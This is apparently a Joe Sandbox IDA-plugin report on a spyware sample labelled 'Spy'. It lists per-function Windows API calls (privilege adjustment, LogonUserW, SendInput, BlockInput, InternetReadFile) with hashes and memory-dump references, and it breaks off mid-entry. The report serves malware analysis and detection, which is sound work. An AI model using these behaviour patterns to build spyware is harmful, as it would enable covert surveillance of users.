                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: 58195f4a9a955d512fee980145a1952f07ad3a90ee8acb3d9fb8572004b7a96f
                                                      • Instruction ID: 0c3c5d500a8aa21809c3c10268df8bc70a4bf1efe744399c04f966048f737b61
                                                      • Opcode Fuzzy Hash: 58195f4a9a955d512fee980145a1952f07ad3a90ee8acb3d9fb8572004b7a96f
                                                      • Instruction Fuzzy Hash: D5D05B72818108EACB049B90CD44FFE73BCEB48300F224056F506E3050D7358788DB26
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00AF1ED6,00000000), ref: 00AF2AAD
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AF2AE4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      • Opcode ID: 52a7261ce736c2ca5e4e996a8c777dcdc12075a57b3183e35a8f41671b7a4b84
                                                      • Instruction ID: 2d77bf6af507bd5f15edd981927e3d6e4c8fc260e8e3aff7cce4360252b126ea
                                                      • Opcode Fuzzy Hash: 52a7261ce736c2ca5e4e996a8c777dcdc12075a57b3183e35a8f41671b7a4b84
                                                      • Instruction Fuzzy Hash: 5A415D7160460DBFEB20EE94CD85FBAB7BCEB407A4F10406AFB45A7181EA719E419760
                                                      APIs
                                                        • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                        • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AD93E3
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AD9410
                                                      • GetLastError.KERNEL32 ref: 00AD941D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: 9033a8a8a9177dde301a3e63cdaccc39d3f5310207731022dffe62c75fff6693
                                                      • Instruction ID: b6dbbb3b87c711b247d60fbbef0188099940ff6c8031d8104758649f6ce96585
                                                      • Opcode Fuzzy Hash: 9033a8a8a9177dde301a3e63cdaccc39d3f5310207731022dffe62c75fff6693
                                                      • Instruction Fuzzy Hash: 16118FB1414209AFD728EF54DD85D6BB7BCEB48710B20852EF45A97281EB70EC41CB64
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE42FF
                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00AE433C
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AE4345
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                      • String ID:
                                                      • API String ID: 33631002-0
                                                      • Opcode ID: 3f92096934044d3b0f56b84cbe3e5da399fa33eb43be7f9cf066d5ad160881f6
                                                      • Instruction ID: 810de1b6f92f25559f539c407ff92c2953d3b38d4204eec6cd8f616bec7948fc
                                                      • Opcode Fuzzy Hash: 3f92096934044d3b0f56b84cbe3e5da399fa33eb43be7f9cf066d5ad160881f6
                                                      • Instruction Fuzzy Hash: FE1182B1910229BFE7109BE99C48FEFB7BCEB0D710F004156B914EB190C6B85E4087A1
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AE4F45
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AE4F5C
                                                      • FreeSid.ADVAPI32(?), ref: 00AE4F6C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: bceb8b7cd61e67a82781b08ef77c2d94a67728aa96155b9644b9f9ed4ce64179
                                                      • Instruction ID: 07690182cbac3684f1d88afcc251ed97d02c0801ec4d167bc96ff6a64627acb4
                                                      • Opcode Fuzzy Hash: bceb8b7cd61e67a82781b08ef77c2d94a67728aa96155b9644b9f9ed4ce64179
                                                      • Instruction Fuzzy Hash: 7EF04975A2130CBFDF00DFE0DC89AEEBBBCEF08201F4044A9A901E3180EB756A448B50
                                                      APIs
                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AE1B01
                                                      • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00AE1B14
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: InputSendkeybd_event
                                                      • String ID:
                                                      • API String ID: 3536248340-0
                                                      • Opcode ID: af158c185cdce154ebffa9dca5cb2800978d409922224581d89d4a9bcdc4d119
                                                      • Instruction ID: 0e67eac8fa7398e32bf043d77cbf57daa5696e1468a2ebb8893d9c91d0e458d6
                                                      • Opcode Fuzzy Hash: af158c185cdce154ebffa9dca5cb2800978d409922224581d89d4a9bcdc4d119
                                                      • Instruction Fuzzy Hash: A2F0A93190024CABDB00DF91C805BFEBBB4FF14301F00800AF94596292D3798611DF94
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00AF9B52,?,00B1098C,?), ref: 00AEA6DA
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00AF9B52,?,00B1098C,?), ref: 00AEA6EC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      • Opcode ID: 155d3660d536c5c3d03b86f24bb0e36d2e636ed963640bc2a2b3fb823b225a73
                                                      • Instruction ID: a37295f02fc296a9da4f029f12cc4c32b1db0434ddbef963d4dc5c4d020a3ea4
                                                      • Opcode Fuzzy Hash: 155d3660d536c5c3d03b86f24bb0e36d2e636ed963640bc2a2b3fb823b225a73
                                                      • Instruction Fuzzy Hash: 5DF0823551422EBBDB20AFA5CC48FEA77ACAF09361F008156B91897191DA709A40CBE1
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AD8F27), ref: 00AD8DFE
                                                      • CloseHandle.KERNEL32(?,?,00AD8F27), ref: 00AD8E10
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      • Opcode ID: c0be6c0195e6377d4eb2ef542285733aac9bc86e89e31a98df9a7c6ac72cf14d
                                                      • Instruction ID: 6ae055b2345734e977aa208cff6f386a8c971ea5bb2eed9b2de9d5ee3604a234
                                                      • Opcode Fuzzy Hash: c0be6c0195e6377d4eb2ef542285733aac9bc86e89e31a98df9a7c6ac72cf14d
                                                      • Instruction Fuzzy Hash: 84E0B676010611EFE7262B60ED09EB77BADEB05360B15C92DF4AA854B0DB62ACD0DB50
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AA8F87,?,?,?,00000001), ref: 00AAA38A
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AAA393
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 0de7747be17cb18b919877a137ae50f8b36f3f5b62b17d0924a45a8462b26155
                                                      • Instruction ID: 8c2ecc9b544c6a1006f908ee80535bc204f304c09052e9f13d000605e6137799
                                                      • Opcode Fuzzy Hash: 0de7747be17cb18b919877a137ae50f8b36f3f5b62b17d0924a45a8462b26155
                                                      • Instruction Fuzzy Hash: 4DB0923107420CEBCA403B91FC09BC83F68EB48B62F808010F61D46064CFA254908A99
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00AF45F0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 3fccb5c4993b4d7c529490099916504c1a6eaeee39bbcb0bec5fe38a500efb56
                                                      • Instruction ID: 100426b60f15dc5f13c062993afb3a2cb247b5a81228a017a320bfbfed5ac638
                                                      • Opcode Fuzzy Hash: 3fccb5c4993b4d7c529490099916504c1a6eaeee39bbcb0bec5fe38a500efb56
                                                      • Instruction Fuzzy Hash: 6EE04F352102199FD710BFA9E904A9BF7E8AF98760F008416FD49D7351DEB0ED418B91
                                                      APIs
                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AE5205
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: 0d983752b29fc27688fbe22bdab808e6ef2982ef8036a24c79463e5e15ba75aa
                                                      • Instruction ID: 85254b9cec51d6d11efeb4670ddebc95546da76b627e42222c4488224708a69a
                                                      • Opcode Fuzzy Hash: 0d983752b29fc27688fbe22bdab808e6ef2982ef8036a24c79463e5e15ba75aa
                                                      • Instruction Fuzzy Hash: 83D052A8960F8A78EC1833BABE0FF761208EB007C8F84874970028A0C2ECD06881A431
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AD8FA7), ref: 00AD9389
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: 0854604f25d62223c7ac238abbd63e833cdfba3f8a7efad1dd6aa6eedf71345d
                                                      • Instruction ID: 52c6625989d39161f9b8a1f11529b4d43dc9e1c31ac11883596ac3c91e06ca80
                                                      • Opcode Fuzzy Hash: 0854604f25d62223c7ac238abbd63e833cdfba3f8a7efad1dd6aa6eedf71345d
                                                      • Instruction Fuzzy Hash: 60D09E3226450EABEF019EA4DD05EEE3B69EB04B01F808511FE15D61A1CB75D935AB60
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00AC0734
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: c3c843ba409625b0b08a3902044e2ebdf4230f0d8ed3730a2623107430487801
                                                      • Instruction ID: 89874b5e0a5ac1fe1730e6e2d3ab661db014f9df5b0ed76a3aab4b8256c6ad2e
                                                      • Opcode Fuzzy Hash: c3c843ba409625b0b08a3902044e2ebdf4230f0d8ed3730a2623107430487801
                                                      • Instruction Fuzzy Hash: 9AC04CF181010DDBCB05DBA0D988EEE77BCAB08305F114059A145B2100D7749B448A71
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AAA35A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: b1115a0167e491ea8c7ed76d59703a08ece2ecb950937cb0a8261407825e05d7
                                                      • Instruction ID: c2d3e0d40518837f13437eb3b3eaab30e2d4e9077106cf6d2221920c396668db
                                                      • Opcode Fuzzy Hash: b1115a0167e491ea8c7ed76d59703a08ece2ecb950937cb0a8261407825e05d7
                                                      • Instruction Fuzzy Hash: B5A0123002010CA78A002B41FC044847F5CD6042507408010F40C01021CB7254504584
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,00B10980), ref: 00B03C65
                                                      • IsWindowVisible.USER32(?), ref: 00B03C89
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: d21f6bb0e190a0ef714a82f90d438d006c8331ddf8341555875d9ec4f4b515ed
                                                      • Instruction ID: 9b50e2e975de780103338a461ccd827b7ebafc53c846a0b60123545166f96c3d
                                                      • Opcode Fuzzy Hash: d21f6bb0e190a0ef714a82f90d438d006c8331ddf8341555875d9ec4f4b515ed
                                                      • Instruction Fuzzy Hash: C5D1A0312043018FCB14EF50C995AAEBBE5EF95744F204999F9466B3E2DB31EE4ACB41
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00B0AC55
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00B0AC86
                                                      • GetSysColor.USER32(0000000F), ref: 00B0AC92
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00B0ACAC
                                                      • SelectObject.GDI32(?,?), ref: 00B0ACBB
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00B0ACE6
                                                      • GetSysColor.USER32(00000010), ref: 00B0ACEE
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00B0ACF5
                                                      • FrameRect.USER32(?,?,00000000), ref: 00B0AD04
                                                      • DeleteObject.GDI32(00000000), ref: 00B0AD0B
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00B0AD56
                                                      • FillRect.USER32(?,?,?), ref: 00B0AD88
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00B0ADB3
                                                        • Part of subcall function 00B0AF18: GetSysColor.USER32(00000012), ref: 00B0AF51
                                                        • Part of subcall function 00B0AF18: SetTextColor.GDI32(?,?), ref: 00B0AF55
                                                        • Part of subcall function 00B0AF18: GetSysColorBrush.USER32(0000000F), ref: 00B0AF6B
                                                        • Part of subcall function 00B0AF18: GetSysColor.USER32(0000000F), ref: 00B0AF76
                                                        • Part of subcall function 00B0AF18: GetSysColor.USER32(00000011), ref: 00B0AF93
                                                        • Part of subcall function 00B0AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B0AFA1
                                                        • Part of subcall function 00B0AF18: SelectObject.GDI32(?,00000000), ref: 00B0AFB2
                                                        • Part of subcall function 00B0AF18: SetBkColor.GDI32(?,00000000), ref: 00B0AFBB
                                                        • Part of subcall function 00B0AF18: SelectObject.GDI32(?,?), ref: 00B0AFC8
                                                        • Part of subcall function 00B0AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00B0AFE7
                                                        • Part of subcall function 00B0AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B0AFFE
                                                        • Part of subcall function 00B0AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00B0B013
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: eef43cb7934c693824dd56539853a40b2cb5e5aaf60c7329e3b8fbf068b988e8
                                                      • Instruction ID: 00923177e3e71bed276506ed193d79f4811bfb9dbda4e6a0de3a3b227b148044
                                                      • Opcode Fuzzy Hash: eef43cb7934c693824dd56539853a40b2cb5e5aaf60c7329e3b8fbf068b988e8
                                                      • Instruction Fuzzy Hash: EEA16E71018305AFD711AF64DC48AAB7BE9FF88321F508A19F562971E0DB74D984CF52
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?), ref: 00A83072
                                                      • DeleteObject.GDI32(00000000), ref: 00A830B8
                                                      • DeleteObject.GDI32(00000000), ref: 00A830C3
                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00A830CE
                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00A830D9
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00ABC77C
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ABC7B5
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ABCBDE
                                                        • Part of subcall function 00A81F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A82412,?,00000000,?,?,?,?,00A81AA7,00000000,?), ref: 00A81F76
                                                      • SendMessageW.USER32(?,00001053), ref: 00ABCC1B
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ABCC32
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ABCC48
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ABCC53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
